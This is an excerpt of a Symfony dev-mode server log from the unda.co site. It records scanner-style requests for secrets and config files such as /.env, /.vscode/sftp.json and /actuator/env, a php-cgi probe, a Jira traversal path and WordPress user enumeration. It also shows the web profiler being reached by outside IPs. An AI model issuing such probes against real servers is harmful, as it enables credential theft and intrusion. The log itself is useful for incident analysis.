  6611. [2025-12-20 08:50:45] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  6612. [2025-12-20 08:50:45] security.DEBUG: Calling Authentication entry point. [] []
  6613. [2025-12-20 08:50:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6614. [2025-12-20 08:50:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6615. [2025-12-20 08:50:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6616. [2025-12-20 08:50:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql/api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql/api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6617. [2025-12-20 08:50:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/gql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/gql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6618. [2025-12-20 08:50:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6619. [2025-12-20 08:50:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6620. [2025-12-20 08:50:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6621. [2025-12-20 08:50:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webjars/swagger-ui/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webjars/swagger-ui/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6622. [2025-12-20 08:50:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6623. [2025-12-20 08:50:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/v1/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/v1/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6624. [2025-12-20 08:50:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6625. [2025-12-20 08:50:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v3/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v3/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6626. [2025-12-20 08:50:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api-docs/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api-docs/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6627. [2025-12-20 08:50:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6628. [2025-12-20 08:50:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /@vite/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /@vite/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6629. [2025-12-20 08:50:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6630. [2025-12-20 08:51:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /php-cgi/php-cgi.exe"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /php-cgi/php-cgi.exe\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6631. [2025-12-20 08:51:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6632. [2025-12-20 08:51:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.vscode/sftp.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.vscode/sftp.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6633. [2025-12-20 08:51:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /about"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /about\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6634. [2025-12-20 08:51:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /debug/default/view"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /debug/default/view\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6635. [2025-12-20 08:51:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/_catalog"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/_catalog\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6636. [2025-12-20 08:51:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6637. [2025-12-20 08:51:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server-status"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server-status\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6638. [2025-12-20 08:51:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login.action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login.action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6639. [2025-12-20 08:51:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_all_dbs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_all_dbs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6640. [2025-12-20 08:51:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.DS_Store"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.DS_Store\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6641. [2025-12-20 08:51:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6642. [2025-12-20 08:51:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6643. [2025-12-20 08:51:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6644. [2025-12-20 08:51:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /telescope/requests"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /telescope/requests\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6645. [2025-12-20 08:51:20] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/?rest_route=%2Fwp%2Fv2%2Fusers%2F","method":"GET"} []
  6646. [2025-12-20 08:51:20] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  6647. [2025-12-20 08:51:20] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  6648. [2025-12-20 08:51:20] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  6649. [2025-12-20 08:51:20] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  6650. [2025-12-20 08:51:20] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  6651. [2025-12-20 08:51:20] security.DEBUG: Calling Authentication entry point. [] []
  6652. [2025-12-20 08:52:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=47.242.70.104&limit=10","method":"GET"} []
  6653. [2025-12-20 08:52:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=47.242.70.104&limit=10","method":"GET"} []
  6654. [2025-12-20 08:53:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"63017c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/63017c?panel=security","method":"GET"} []
  6655. [2025-12-20 08:53:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  6656. [2025-12-20 08:57:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6657. [2025-12-20 08:58:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c4fb0b","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/c4fb0b?panel=events","method":"GET"} []
  6658. [2025-12-20 08:58:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  6659. [2025-12-20 08:59:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"915a40","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/915a40","method":"GET"} []
  6660. [2025-12-20 08:59:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  6661. [2025-12-20 08:59:11] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  6662. [2025-12-20 08:59:20] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"5ebd67","_route":"_wdt"},"request_uri":"https://unda.co/_wdt/5ebd67","method":"GET"} []
  6663. [2025-12-20 08:59:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=199.45.154.156&limit=10","method":"GET"} []
  6664. [2025-12-20 08:59:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=199.45.154.156&limit=10","method":"GET"} []
  6665. [2025-12-20 09:00:08] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  6666. [2025-12-20 09:00:08] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  6667. [2025-12-20 09:00:09] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  6668. [2025-12-20 09:00:09] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  6669. [2025-12-20 09:02:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2263c2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2263c2?panel=cache","method":"GET"} []
  6670. [2025-12-20 09:02:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  6671. [2025-12-20 09:03:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"025fac","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/025fac?panel=config","method":"GET"} []
